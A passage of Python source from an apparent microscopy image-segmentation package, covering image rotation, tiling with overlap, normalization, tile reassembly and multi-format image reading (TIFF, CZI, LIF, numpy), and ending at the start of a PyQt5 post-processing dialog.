:param img: image to be rotated
:param angle: int in [90, 180, 270] or 'random' string
:return: a rotated image without interpolation
'''
if angle == 'random': # 'is' comparison with a string literal is unreliable
angle = random.choice([90, 180, 270])
return Img.interpolation_free_rotation(img, angle=angle)
else:
if angle < 0:
angle = 360 + angle
if angle == 270:
return np.rot90(img, 3)
elif angle == 180:
return np.rot90(img, 2)
else:
return np.rot90(img)
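# Hedged usage sketch: rotations are multiples of 90 degrees applied
# counter-clockwise via np.rot90, so no interpolation artifacts are introduced.
# rotated = Img.interpolation_free_rotation(img, angle=270)
# augmented = Img.interpolation_free_rotation(img, angle='random')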
@staticmethod
def get_2D_tiles_with_overlap(inp, width=512, height=512, overlap=0, overlap_x=None, overlap_y=None, dimension_h=0,
dimension_w=1, force_to_size=False):
'''split 2 and 3D images with h/w overlap
Parameters
----------
inp : ndarray
input image to be cut into tiles
width : int
desired tile width
height : int
desired tile width
overlap : int
tile w and h overlap
overlap_x : int
tile overlap w axis (if set overrides overlap)
overlap_y : int
tile overlap y axis (if set overrides overlap)
dimension_h : int
position of the h dimension in the ndarray
dimension_w : int
position of the w dimension in the ndarray
force_to_size : boolean
if True add empty pixels around the image to force image to have width and height
Returns
-------
dict, 2D list
a dict containing instructions to reassemble the tiles, and a 2D list containing all the tiles
'''
if overlap_x is None:
overlap_x = overlap
if overlap_y is None:
overlap_y = overlap
# for debug
# overlap_x = 32
# overlap_y = 32
if dimension_h < 0:
dimension_h = len(inp.shape) + dimension_h
if dimension_w < 0:
dimension_w = len(inp.shape) + dimension_w
# print('inpshape', inp.shape, width, height, dimension_h, dimension_w)
final_height = inp.shape[dimension_h]
final_width = inp.shape[dimension_w]
if overlap_x % 2 != 0 or overlap_y % 2 != 0:
logger.error(
'Warning: overlap in the x or y dimension is not even; this will cause numerous errors, please change it!')
last_idx = 0
cuts_y = []
end = 0
# print(overlap_x, overlap_y, 'overlap')
if height >= inp.shape[dimension_h]:
overlap_y = 0
if width >= inp.shape[dimension_w]:
overlap_x = 0
# print(overlap_x, overlap_y, 'overlap', height, width, inp.shape[dimension_w], inp.shape[dimension_h])
if height + overlap_y < inp.shape[dimension_h]:
for idx in range(height, inp.shape[dimension_h], height):
begin = last_idx
end = idx + overlap_y
if begin < 0:
begin = 0
if end >= inp.shape[dimension_h]:
end = inp.shape[dimension_h]
cuts_y.append((begin, end))
last_idx = idx
if end < inp.shape[dimension_h] - 1:
begin = last_idx
end = inp.shape[dimension_h]
if begin < 0:
begin = 0
cuts_y.append((begin, end))
elif height + overlap_y > inp.shape[dimension_h]:
height += overlap_y
overlap_y = 0
padding = []
for dim in range(len(inp.shape)):
padding.append((0, 0))
# padding_required = False
padding[dimension_h] = (0, height - inp.shape[dimension_h])
# padding_required = True
# bigger = np.zeros(
# (*inp.shape[:dimension_h], height + overlap_y, inp.shape[dimension_w], *inp.shape[dimension_w + 1:]),
# dtype=inp.dtype)
# if dimension_h == 2:
# bigger[:, :, :inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
# elif dimension_h == 1:
# bigger[:, :inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
# elif dimension_h == 0:
# bigger[:inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
bigger = np.pad(inp, pad_width=tuple(padding), mode='symmetric')
inp = bigger
del bigger
cuts_y.append((0, inp.shape[dimension_h]))
else:
cuts_y.append((0, inp.shape[dimension_h]))
# now split image along x direction
last_idx = 0
cuts_x = []
if width + overlap_x < inp.shape[dimension_w]:
for idx in range(width, inp.shape[dimension_w], width):
begin = last_idx
end = idx + overlap_x
if begin < 0:
begin = 0
if end >= inp.shape[dimension_w]:
end = inp.shape[dimension_w]
cuts_x.append((begin, end))
last_idx = idx
if end < inp.shape[dimension_w] - 1:
begin = last_idx
end = inp.shape[dimension_w]
if begin < 0:
begin = 0
cuts_x.append((begin, end))
elif width + overlap_x > inp.shape[dimension_w]:
width += overlap_x
overlap_x = 0
# bigger = np.zeros((*inp.shape[:dimension_w], width + overlap_x, *inp.shape[dimension_w + 1:]),
# dtype=inp.dtype)
# if dimension_w == 3:
# bigger[:, :, :inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
# elif dimension_w == 2:
# bigger[:, :inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
# elif dimension_w == 1:
# bigger[:inp.shape[dimension_h], :inp.shape[dimension_w]] = inp
padding = []
for dim in range(len(inp.shape)):
padding.append((0, 0))
# padding_required = False
padding[dimension_w] = (0, width - inp.shape[dimension_w])
bigger = np.pad(inp, pad_width=tuple(padding), mode='symmetric')
inp = bigger
del bigger
cuts_x.append((0, inp.shape[dimension_w]))
else:
cuts_x.append((0, inp.shape[dimension_w]))
nb_tiles = 0
final_splits = []
for x_begin, x_end in cuts_x:
cols = []
for y_begin, y_end in cuts_y:
# try crop with real data if possible otherwise add black area around
if (y_end == inp.shape[0] or x_end == inp.shape[1]) and (
width + overlap_x <= inp.shape[1] and height + overlap_y <= inp.shape[0]):
if dimension_h == 2:
cur_slice = inp[:, :, y_end - (height + overlap_y):y_end, x_end - (width + overlap_x):x_end]
elif dimension_h == 1:
cur_slice = inp[:, y_end - (height + overlap_y):y_end, x_end - (width + overlap_x):x_end]
elif dimension_h == 0:
cur_slice = inp[y_end - (height + overlap_y):y_end, x_end - (width + overlap_x):x_end]
else:
if dimension_h == 2:
cur_slice = inp[:, :, y_begin:y_end, x_begin:x_end]
elif dimension_h == 1:
cur_slice = inp[:, y_begin:y_end, x_begin:x_end]
elif dimension_h == 0:
cur_slice = inp[y_begin:y_end, x_begin:x_end]
nb_tiles += 1
if not force_to_size:
cols.append(cur_slice)
else:
# if size is still smaller than desired resize
padding = []
for dim in range(len(cur_slice.shape)):
padding.append((0, 0))
padding_required = False
if cur_slice.shape[dimension_h] < height + overlap_y:
padding[dimension_h] = (0, (height + overlap_y) - cur_slice.shape[dimension_h])
padding_required = True
# bigger = np.zeros(
# (*cur_slice.shape[:dimension_h], height + overlap_y, cur_slice.shape[dimension_w],
# *cur_slice.shape[dimension_w + 1:]), dtype=cur_slice.dtype)
# if dimension_h == 2:
# bigger[:, :, :cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# elif dimension_h == 1:
# bigger[:, :cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# elif dimension_h == 0:
# bigger[:cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
if cur_slice.shape[dimension_w] < width + overlap_x:
padding[dimension_w] = (0, (width + overlap_x) - cur_slice.shape[dimension_w])
padding_required = True
# print('padding_required', padding_required, cur_slice.shape[dimension_h],cur_slice.shape[dimension_w], width + overlap_x, height+overlap_x)
if padding_required:
# print('dding here', padding)
bigger = np.pad(cur_slice, pad_width=tuple(padding), mode='symmetric')
cur_slice = bigger
del bigger
# if cur_slice.shape[dimension_w] < width + overlap_x:
# bigger = np.zeros(
# (*cur_slice.shape[:dimension_w], width + overlap_x, *cur_slice.shape[dimension_w + 1:]),
# dtype=cur_slice.dtype)
# if dimension_w == 3:
# bigger[:, :, :cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# elif dimension_w == 2:
# bigger[:, :cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# elif dimension_w == 1:
# bigger[:cur_slice.shape[dimension_h], :cur_slice.shape[dimension_w]] = cur_slice
# cur_slice = bigger
cols.append(cur_slice)
final_splits.append(cols)
crop_params = {'overlap_y': overlap_y, 'overlap_x': overlap_x, 'final_height': final_height,
'final_width': final_width, 'n_cols': len(final_splits[0]), 'n_rows': len(final_splits),
'nb_tiles': nb_tiles}
return crop_params, final_splits
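# Hedged usage sketch (illustrative sizes): cut a 2D image into 256x256 tiles
# with a 32-pixel overlap; crop_params keeps everything needed to reassemble.
# NB the overlap must be even (an odd overlap triggers the error above).
# crop_params, tiles = Img.get_2D_tiles_with_overlap(img, width=256, height=256,
#                                                    overlap=32, dimension_h=0, dimension_w=1)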
@staticmethod
def tiles_to_linear(tiles):
'''converts tiles to a 1D list
Parameters
----------
tiles : 2D list
image tiles
Returns
-------
list
1D list containing tiles
'''
linear = []
for idx in range(len(tiles)):
for j in range(len(tiles[0])):
linear.append(tiles[idx][j])
return linear
@staticmethod
def tiles_to_batch(tiles):
'''converts 2D list of tiles to an ndarray with a batch dimension (for tensorflow input)
Parameters
----------
tiles : 2D list
tiled image
Returns
-------
ndarray
ndarray with a batch dimension as the first dimension
'''
linear = Img.tiles_to_linear(tiles)
out = np.concatenate(tuple(linear), axis=0)
return out
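# Hedged note: concatenation is along axis 0, so each tile is assumed to
# already carry a leading batch axis (e.g. shape (1, h, w, c)); plain (h, w, c)
# tiles would be stacked along h instead.
# batch = Img.tiles_to_batch(tiles)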
@staticmethod
def normalization(img, method=None, range=None, individual_channels=False, clip=False,
normalization_minima_and_maxima=None):
'''normalize an image
Parameters
----------
img : ndarray
input image
method : string
normalization method
range : list
range of the image after normalization (e.g. [0, 1], [-1,1]
individual_channels : boolean
if True normalization is per channel (i.e. max and min are computed for each channel individually, rather than globally)
Returns
-------
ndarray
a normalized image
'''
if img is None:
logger.error("'None' image cannot be normalized")
return
logger.debug('max before normalization=' + str(img.max()) + ' min before normalization=' + str(img.min()))
if method is None or method == 'None':
logger.debug('Image is not normalized')
return img
if 'ercentile' in method:
logger.debug('Image will be normalized using percentiles')
img = img.astype(np.float32)
img = Img._nomalize(img, individual_channels=individual_channels, method=method,
norm_range=range, clip=clip,
normalization_minima_and_maxima=normalization_minima_and_maxima) # TODO if range is list of list --> assume per channel data and do norm that way --> TODO --> think about the best way to do that
logger.debug('max after normalization=' + str(img.max()) + ' min after normalization=' + str(img.min()))
return img
elif 'ormalization' in method and not 'tandardization' in method:
logger.debug('Image will be normalized')
img = img.astype(np.float32)
img = Img._nomalize(img, individual_channels=individual_channels, method=method,
norm_range=range)
logger.debug('max after normalization=' + str(img.max()) + ' min after normalization=' + str(img.min()))
return img
elif 'tandardization' in method:
logger.debug('Image will be standardized')
img = img.astype(np.float32)
img = Img._standardize(img, individual_channels=individual_channels, method=method,
norm_range=range)
logger.debug('max after standardization=' + str(img.max()) + ' min after standardization=' + str(img.min()))
return img
else:
logger.error('unknown normalization method ' + str(method))
return img
# https://en.wikipedia.org/wiki/Feature_scaling
@staticmethod
def _nomalize(img, individual_channels=False, method='Rescaling (min-max normalization)', norm_range=None,
clip=False, normalization_minima_and_maxima=None):
eps = 1e-20 # for numerical stability avoid division by 0
if individual_channels:
for c in range(img.shape[-1]):
norm_min_max = None
if normalization_minima_and_maxima is not None:
# if list of list then use that --> in fact could also check if individual channel or not...
if isinstance(normalization_minima_and_maxima[0], list):
norm_min_max = normalization_minima_and_maxima[c]
else:
norm_min_max = normalization_minima_and_maxima
img[..., c] = Img._nomalize(img[..., c], individual_channels=False, method=method,
norm_range=norm_range, clip=clip,
normalization_minima_and_maxima=norm_min_max)
else:
# that should work
if 'percentile' in method:
# direct_range ??? --> think how to do that ???
# TODO here in some cases need assume passed directly the percentiles and in that case need not do that again... --> think how to do that --> shall I pass a second parameter directly --> maybe direct_range that bypasses the percentiles if set --> TODO --> check that
if normalization_minima_and_maxima is None:
lowest_percentile = np.percentile(img, norm_range[0])
highest_percentile = np.percentile(img, norm_range[1])
else:
lowest_percentile = normalization_minima_and_maxima[0]
highest_percentile = normalization_minima_and_maxima[1]
try:
import numexpr
img = numexpr.evaluate(
"(img - lowest_percentile) / ( highest_percentile - lowest_percentile + eps )")
except:
img = (img - lowest_percentile) / (highest_percentile - lowest_percentile + eps)
if clip:
img = np.clip(img, 0, 1)
elif method == 'Rescaling (min-max normalization)':
max = img.max()
min = img.min()
# if max != 0 and max != min:
if norm_range is None or norm_range == [0, 1] or norm_range == '[0, 1]' or norm_range == 'default' \
or isinstance(norm_range, int):
try:
import numexpr
img = numexpr.evaluate("(img - min) / (max - min + eps)")
except:
img = (img - min) / (
max - min + eps) # TODO will it take less memory if I split it into two lines
elif norm_range == [-1, 1] or norm_range == '[-1, 1]':
try:
import numexpr
img = numexpr.evaluate("-1 + ((img - min) * (1 - -1)) / (max - min + eps)")
except:
img = -1 + ((img - min) * (1 - -1)) / (max - min + eps)
elif method == 'Mean normalization':
# TODO should I implement range too here ??? or deactivate it
max = img.max()
min = img.min()
if max != 0 and max != min:
img = (img - np.average(img)) / (max - min)
elif method.startswith('Max normalization'): # here too assume 0-1 no need for range
if 'auto' in method:
max = img.max()
elif '255' in method:
max = 255
elif '4095' in method:
max = 4095
elif '65535' in method:
max = 65535
if max != 0:
try:
import numexpr
img = numexpr.evaluate("img / max")
except:
img = img / max
else:
logger.error('Unknown normalization method "' + str(method) + '" --> ignoring ')
return img
@staticmethod
def _standardize(img, individual_channels=False, method=None, norm_range=None):
if individual_channels:
for c in range(img.shape[-1]):
img[..., c] = Img._standardize(img[..., c], individual_channels=False, method=method,
norm_range=norm_range)
else:
mean = np.mean(img)
std = np.std(img)
# print('mean', mean, 'std', std)
if std != 0.0:
img = (img - mean) / std
else:
logger.error('cannot standardize an image with zero standard deviation')
if mean != 0.0:
img = (img - mean)
if norm_range == [0, 1] or norm_range == [-1, 1] or norm_range == '[0, 1]' or norm_range == '[-1, 1]':
img = Img._nomalize(img, method='Rescaling (min-max normalization)',
individual_channels=individual_channels, norm_range=[0, 1])
if norm_range == [-1, 1] or norm_range == '[-1, 1]':
img = (img - 0.5) * 2.
logger.debug('max after standardization=' + str(img.max()) + ' min after standardization=' + str(img.min()))
return img
@staticmethod
def reassemble_tiles(tiles, crop_parameters, three_d=False):
'''Reassembles previously generated tiles into a single image
Parameters
----------
tiles : list
input tiles
crop_parameters : dict
parameters required to reassemble the tiles
three_d : boolean
if True assume image is 3D (dhw), 2D (hw) otherwise
Returns
-------
ndarray
a reassembled image from individual tiles
'''
overlap_y = crop_parameters['overlap_y']
overlap_x = crop_parameters['overlap_x']
final_height = crop_parameters['final_height']
final_width = crop_parameters['final_width']
cols = []
for i in range(len(tiles)):
cur_size = 0
for j in range(len(tiles[0])):
if j == 0:
if overlap_y != 0:
y_slice = slice(None, -int(overlap_y / 2))
else:
y_slice = slice(None, None)
elif j == len(tiles[0]) - 1:
if overlap_y != 0:
y_slice = slice(int(overlap_y / 2), None)
else:
y_slice = slice(None, None)
else:
if overlap_y != 0:
y_slice = slice(int(overlap_y / 2), -int(overlap_y / 2))
else:
y_slice = slice(None, None)
if not three_d:
tiles[i][j] = tiles[i][j][y_slice, ...]
cur_size += tiles[i][j].shape[0]
else:
tiles[i][j] = tiles[i][j][:, y_slice, ...]
cur_size += tiles[i][j].shape[1]
if not three_d:
cols.append(np.vstack(tuple(tiles[i])))
else:
cols.append(np.hstack(tuple(tiles[i])))
cur_size = 0
for i in range(len(cols)):
if i == 0:
if overlap_x != 0:
x_slice = slice(None, -int(overlap_x / 2))
else:
x_slice = slice(None, None)
elif i == len(cols) - 1:
if overlap_x != 0:
x_slice = slice(int(overlap_x / 2), None) # orig
else:
x_slice = slice(None, None)
else:
if overlap_x != 0:
x_slice = slice(int(overlap_x / 2), -int(overlap_x / 2))
else:
x_slice = slice(None, None)
if not three_d:
if len(cols[i].shape) == 3:
cols[i] = cols[i][:, x_slice]
else:
cols[i] = cols[i][:, x_slice, ...]
cur_size += cols[i].shape[1]
else:
if len(cols[i].shape) == 3:
cols[i] = cols[i][:, :, x_slice]
else:
cols[i] = cols[i][:, :, x_slice, ...]
cur_size += cols[i].shape[2]
if not three_d:
return np.hstack(tuple(cols))[:final_height, :final_width]
else:
return np.dstack(tuple(cols))[:, :final_height, :final_width]
@staticmethod
def linear_to_2D_tiles(tiles, crop_parameters):
'''converts a 1D list to a 2D list
Parameters
----------
tiles : list
1D list containing tiles
crop_parameters : dict
parameters to recreate a 2D list from a 1D one (i.e. nb of rows and cols)
Returns
-------
list
a 2D list containing tiles
'''
n_rows = crop_parameters['n_rows']
n_cols = crop_parameters['n_cols']
nb_tiles = crop_parameters['nb_tiles']
output = []
counter = 0
for i in range(n_rows):
cols = []
for j in range(n_cols):
cols.append(tiles[counter])
counter += 1
output.append(cols)
return output
# should dynamically crop images
def crop(self, **kwargs):
'''crops an image
Parameters
----------
kwargs : dict
a dict containing the top left corner and the bottom right coordinates of the crop x1, y1, x2, y2
Returns
-------
ndarray
a crop of the image
'''
img = self
corrected_metadata = dict(self.metadata)
dims = []
for i in range(len(img.shape)):
dims.append(slice(None))
# get the dim and its begin and end and create the appropriate slice
for key, value in kwargs.items():
if key in self.metadata['dimensions']:
idx = self.metadata['dimensions'].index(key)
if isinstance(value, list):
if len(value) == 2:
dims[idx] = slice(value[0], value[1])
elif len(value) == 3:
dims[idx] = slice(value[0], value[1], value[2])
# update the width and height parameters then or suppress w and h parameters from the data to avoid pbs
elif len(value) == 1:
dims[idx] = value
corrected_metadata.update(
{'dimensions': corrected_metadata['dimensions'].replace(key, '')}) # do remove dimension
else:
if value is not None:
dims[idx] = value
corrected_metadata.update(
{'dimensions': corrected_metadata['dimensions'].replace(key, '')}) # do remove dimension
else:
dims[idx] = slice(None)
# TODO need reduce size dim for the stuff in the metadata to avoid bugs
img = np.ndarray.copy(img[tuple(dims)])
output = Img(img, metadata=corrected_metadata)
return output
# should be able to parse any dimension in fact by its name
# IMPORTANT NEVER CALL IT COPY OTHERWISE OVERRIDES THE DEFAULT COPY METHOD OF NUMPY ARRAY THAT CREATES ERRORS
def imCopy(self, t=None, d=None, c=None):
'''Returns a copy of the image, optionally restricted to a given time point, z/depth slice and/or channel
Parameters
----------
t : int
the index of the time series to copy
d : int
the index of the z/d to copy
c : int
the channel to copy
Returns
-------
Img
a (sub)copy of the image
'''
img = self
corrected_metadata = dict(self.metadata)
dims = []
for i in range(len(img.shape)):
dims.append(slice(None))
if t is not None and self.has_t():
idx = self.metadata['dimensions'].index('t')
dims[idx] = t
corrected_metadata.update({'dimensions': corrected_metadata['dimensions'].replace('t', '')})
if d is not None and self.has_d():
idx = self.metadata['dimensions'].index('d')
dims[idx] = d
corrected_metadata.update({'dimensions': corrected_metadata['dimensions'].replace('d', '')})
if c is not None and self.has_c():
idx = self.metadata['dimensions'].index('c')
dims[idx] = c
corrected_metadata.update({'dimensions': corrected_metadata['dimensions'].replace('c', '')})
# TODO finalize this to handle any slicing possible --> in fact it's relatively easy
img = np.ndarray.copy(img[tuple(dims)])
output = Img(img, metadata=corrected_metadata)
return output
def within(self, x, y):
    '''True if the pixel (x, y) lies within the image bounds, False otherwise
    '''
    return 0 <= x < self.get_width() and 0 <= y < self.get_height()
@staticmethod
def clip(img, tuple=None, min=None, max=None):
# clip an image to a defined range
if tuple is not None:
min = tuple[0]
max = tuple[1]
img = np.clip(img, a_min=min, a_max=max)
return img
@staticmethod
def invert(img):
# returns the negative of the image (per-image max minus each pixel value)
max = img.max()
img = np.negative(img) + max
return img
@staticmethod
def clip_by_frequency(img, lower_cutoff=None, upper_cutoff=0.05, channel_mode=True):
logger.debug('inside clip lower=' + str(lower_cutoff) + ' upper=' + str(upper_cutoff) + ' channel_mode=' + str(channel_mode))
if lower_cutoff == upper_cutoff == 0:
logger.debug('clip: keep image unchanged')
return img
if lower_cutoff is None and upper_cutoff == 0:
logger.debug('clip: keep image unchanged')
return img
if upper_cutoff is None and lower_cutoff == 0:
logger.debug('clip: keep image unchanged')
return img
if lower_cutoff is None and upper_cutoff is None:
logger.debug('clip: keep image unchanged')
return img
logger.debug('chan mode ' + str(channel_mode))
if channel_mode:
for ch in range(img.shape[-1]):
img[..., ch] = Img.clip_by_frequency(img[..., ch], lower_cutoff=lower_cutoff, upper_cutoff=upper_cutoff,
channel_mode=False)
return img
# print('min', img.min(), 'max', img.max())
if img.max() == img.min():
return img
logger.debug('Removing image outliers/hot pixels')
if upper_cutoff is not None: # added this to avoid black images
max = np.percentile(img, 100. * (1. - upper_cutoff))
img[img > max] = max
if lower_cutoff is not None:
min = np.percentile(img, 100. * lower_cutoff)
img[img < min] = min
# print('--> min', img.min(), 'max', img.max())
return img
class ImageReader:
@staticmethod
def read(f, serie_to_open=None):
width = None
height = None
depth = None
channels = None
voxel_x = None
voxel_y = None
voxel_z = None
times = None
bits = None
t_frames = None
luts = None
ar = None
overlays = None
roi = None
dimensions_string = ''
metadata = {'w': width, 'h': height, 'c': channels, 'd': depth, 't': t_frames, 'bits': bits, 'vx': voxel_x,
'vy': voxel_y, 'vz': voxel_z, 'AR': ar, 'dimensions': dimensions_string, 'LUTs': luts,
'times': times, 'Overlays': overlays, 'ROI': roi} # TODO check always ok
logger.debug('loading' + str(f))
if f.lower().endswith('.tif') or f.lower().endswith('.tiff') or f.lower().endswith(
'.lsm'):
with tifffile.TiffFile(f) as tif:
# TODO need handle ROIs there!!!
# just copy stuff
# --> can then use it and pass it directly then if needed --> maybe need a smart handling in case there is a reduction of the number of dimensions to only keep the correct ROIs
# if image is IJ image preserve ROIs and overlays
if tif.is_imagej:
if 'Overlays' in tif.imagej_metadata:
overlays = tif.imagej_metadata['Overlays']
metadata['Overlays'] = overlays
if 'ROI' in tif.imagej_metadata:
roi = tif.imagej_metadata['ROI']
metadata['ROI'] = roi
tif_tags = {}
for tag in tif.pages[0].tags.values():
name, value = tag.name, tag.value
tif_tags[name] = value
logger.debug("'" + name + "' = '" + str(value) + "'")
if name == 'ImageWidth':
width = value
elif name == 'ImageLength':
height = value
elif name == 'BitsPerSample':
if not isinstance(value, tuple):
bits = value
else:
bits = value[0]
elif name == 'XResolution':
voxel_x = value[1] / value[0]
elif name == 'YResolution':
voxel_y = value[1] / value[0]
elif name == 'ImageDescription':
lines = value.split()
for l in lines:
logger.debug("'" + l + "'")
if l.startswith('channels'):
_, val = l.split('=')
channels = int(val)
elif l.startswith('slices'): # Z slices
_, val = l.split('=')
depth = int(val)
elif l.startswith('frames'): # time frames
_, val = l.split('=')
t_frames = int(val)
elif l.startswith('spacing'):
_, val = l.split('=')
voxel_z = float(val)
# read lsm
if isinstance(value, dict):
for name, value in value.items():
logger.debug(name + ' ' + str(value))
if name == 'DimensionZ':
depth = value
elif name == 'DimensionX':
width = value
elif name == 'DimensionY':
height = value
elif name == 'DimensionTime':
t_frames = value
if t_frames == 1:
t_frames = None
elif name == 'DimensionChannels':
channels = value
elif name == 'VoxelSizeX':
voxel_x = value * 1_000_000
elif name == 'VoxelSizeY':
voxel_y = value * 1_000_000
elif name == 'VoxelSizeZ':
voxel_z = value * 1_000_000
elif name == 'TimeStamps':
times = value
elif name == 'ChannelColors':
luts = value['Colors']
if f.lower().endswith('.tif') or f.lower().endswith('.tiff') or f.lower().endswith('.lsm'):
image_stack = tifffile.imread(f)
image = image_stack
image = np.squeeze(image)
elif f.lower().endswith('.czi'):
with czifile.CziFile(f) as czi:
meta_data = czi.metadata(raw=False)  # metadata as a dict; the dict misses the x/y/z voxel sizes, so the xml is parsed manually below
logger.debug(meta_data)
xml_metadata = czi.metadata()
root = ET.fromstring(xml_metadata)
# manually parse xml as dict is erroneous to get the x, y and z voxel sizes
for l in root.findall('./*/Scaling/Items/Distance'):
    distance = l.find('Value').text
    name = l.get('Id')
    if name == 'X':
        voxel_x = float(distance) * 1_000_000
    if name == 'Y':
        voxel_y = float(distance) * 1_000_000
    if name == 'Z':
        voxel_z = float(distance) * 1_000_000
image = czi.asarray()
bits = meta_data['ImageDocument']['Metadata']['Information']['Image']['ComponentBitCount']
width = meta_data['ImageDocument']['Metadata']['Information']['Image']['SizeX']
height = meta_data['ImageDocument']['Metadata']['Information']['Image']['SizeY']
depth = meta_data['ImageDocument']['Metadata']['Information']['Image']['SizeZ']
image = np.squeeze(image) # removes all the empty dimensions
elif f.lower().endswith('.lif'):
image = None
reader = read_lif.Reader(f)
series = reader.getSeries()
# print('series', len(series))
if serie_to_open is None:
chosen = series[0]
else:
if serie_to_open >= len(series) or serie_to_open < 0:
logger.error('Out of range serie nb for current lif file, returning None')
return None
chosen = series[serie_to_open]
meta_data = chosen.getMetadata()
voxel_x = meta_data['voxel_size_x']
voxel_y = meta_data['voxel_size_y']
voxel_z = meta_data['voxel_size_z']
width = meta_data['voxel_number_x']
height = meta_data['voxel_number_y']
depth = meta_data['voxel_number_z']
channels = meta_data['channel_number']
times = chosen.getTimeStamps()
t_frames = chosen.getNbFrames()
# print('t_frames', t_frames)
# TODO check time points cause I think they are not ok for the t frames
# stack = None
for T in range(t_frames):
channel_frames = []
for i in range(channels):
    cur_image = chosen.getFrame(T=T, channel=i)
    cur_image = np.moveaxis(cur_image, -1, 0)
    channel_frames.append(cur_image)
# stack all channels at once; pairwise stacking would nest the arrays when channels > 2
zstack = channel_frames[0] if channels == 1 else np.stack(channel_frames, axis=-1)
if image is None:
image = zstack[np.newaxis, ...]
# stack = image
else:
# print(image.shape, zstack.shape)
image = np.vstack((image, zstack[np.newaxis, ...]))
# stack = np.vstack((stack, image), axis = np.newaxis)
# if only one T --> reduce dimensionality
if t_frames == 1:
t_frames = None
# print('before squeeze', image.shape)
image = np.squeeze(image)
# image = stack
else:
if not f.lower().endswith('.npy') and not f.lower().endswith('.npz'):
# for some reason this stuff reads 8 bits images as RGB and that causes some trouble
image = skimage.io.imread(f)
else:
# load numpy image directly
if f.lower().endswith('.npy'):
image = np.load(f)
try:
with open(f + '.meta') as json_file:
metadata = json.load(json_file)
except:
logger.debug('could not load metadata ' + str(f + '.meta'))
# replace metadata from this file
return metadata, image
else:
all_data = np.load(f)
# recover the 'data' array if present, otherwise fall back to the first array in the archive
if 'data' in all_data.files:
    image = all_data['data']
else:
    image = all_data[all_data.files[0]]
# TODO allow support for metadata some day
return None, image
if voxel_x is not None and voxel_z is not None:
ar = voxel_z / voxel_x
logger.debug('original dimensions:' + str(image.shape))
if image.shape[1] != height and image.ndim == 4 and t_frames is None:
image = np.moveaxis(image, [1], -1)
if image.ndim >= 3 and image.shape[2] != height and image.ndim == 5:
image = np.moveaxis(image, [2], -1)
if channels is not None and image.ndim == 3 and image.shape[0] == channels:
image = np.moveaxis(image, [0], -1)
if channels is not None and image.ndim == 4 and image.shape[1] == channels:
image = np.moveaxis(image, [1], -1)
dimensions_string += 'hw'
if depth is not None:
dimensions_string = 'd' + dimensions_string
if channels is None and width != image.shape[-1] and len(image.shape) > 2:
channels = image.shape[-1]
if channels is not None and channels > 1:
dimensions_string += 'c'
if t_frames is not None:
dimensions_string = 't' + dimensions_string
else:
if image.ndim > len(dimensions_string):
dimensions_string = 't' + dimensions_string
t_frames = image.shape[0]
if width is None and image.ndim >= 3:
width = image.shape[-2]
if height is None and image.ndim >= 3:
height = image.shape[-3]
if width is None and image.ndim == 2:
width = image.shape[-1]
if height is None and image.ndim == 2:
height = image.shape[-2]
# update metadata
metadata.update({'w': width, 'h': height, 'c': channels, 'd': depth, 't': t_frames, 'bits': bits, 'vx': voxel_x,
'vy': voxel_y, 'vz': voxel_z, 'AR': ar, 'dimensions': dimensions_string, 'LUTs': luts,
'times': times, 'Overlays': overlays, 'ROI': roi})
# print(metadata)
logger.debug('image params:' + str(metadata))
logger.debug('final shape:' + str(image.shape))
return metadata, image
def imageread(self, filePath):
# TODO return other metadata here such as the number of frames; also decide whether skimage is the right reader
temp = skimage.io.imread(filePath[0])
h, w, c = temp.shape
d = len(filePath)
volume = np.zeros((d, w, h, c), dtype=np.uint16)  # TODO: the dtype should probably follow the input image instead of being forced to uint16
k = 0
for img in filePath: # assuming tif
im = skimage.io.imread(img)
volume[k, :, :, :] = np.swapaxes(im[:, :, :], 0, 1)
k += 1
return volume
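# Usage sketch for the static reader above (file name hypothetical):
#   metadata, image = ImageReader.read('stack.tif')
#   print(metadata['dimensions'], metadata['vx'], image.shape)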
if __name__ == '__main__':
data = np.zeros((1024, 1024), dtype=np.uint8)
```
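The `Img` normalization and clipping helpers above are static, so they can be exercised on plain NumPy arrays. A minimal sketch, assuming the import path `epyseg.img` from the file header and using synthetic data:

```python
import numpy as np
from epyseg.img import Img  # assumed import path, per the file header above

# synthetic (h, w, c) intensity image
img = (np.random.rand(256, 256, 1) * 4095).astype(np.float32)

# percentile normalization: rescale between the 1st and 99th percentiles, per channel
norm = Img.normalization(img.copy(), method='percentile normalization',
                         range=[1, 99], individual_channels=True, clip=True)

# hot-pixel removal: clip the brightest 5% of values in each channel
cleaned = Img.clip_by_frequency(img.copy(), upper_cutoff=0.05, channel_mode=True)
```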
#### File: epyseg/postprocess/gui.py
```python
from PyQt5.QtWidgets import QDialog, QDoubleSpinBox, QToolTip, QPushButton, QDialogButtonBox
from PyQt5.QtWidgets import QApplication, QGridLayout
from PyQt5.QtWidgets import QSpinBox, QComboBox, QVBoxLayout, QLabel, QCheckBox, QGroupBox
from PyQt5.QtCore import Qt, QPoint
from PyQt5 import QtWidgets, QtCore
import sys
# logging
from epyseg.deeplearning.docs.doc2html import markdown_file_to_html
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class PostProcessGUI(QDialog):
def __init__(self, parent_window=None, _is_dialog=False):
super().__init__(parent=parent_window)
self._is_dialog = _is_dialog
self.initUI()
def initUI(self):
input_v_layout = QVBoxLayout()
input_v_layout.setAlignment(Qt.AlignTop)
input_v_layout.setContentsMargins(0, 0, 0, 0)
# TODO add a set of parameters there for the post process
self.groupBox_post_process = QGroupBox(
'Refine segmentation/Create a binary mask', objectName='groupBox_post_process')
self.groupBox_post_process.setCheckable(True)
self.groupBox_post_process.setChecked(True)
# self.groupBox_post_process.setEnabled(True)
group_box_post_process_parameters_layout = QGridLayout()
group_box_post_process_parameters_layout.setAlignment(Qt.AlignTop)
group_box_post_process_parameters_layout.setHorizontalSpacing(3)
group_box_post_process_parameters_layout.setVerticalSpacing(3)
# do a radio dialog with all the stuff needed...
# test all
post_process_method_selection_label = QLabel('Post process method') # (or bond score for pretrained model)
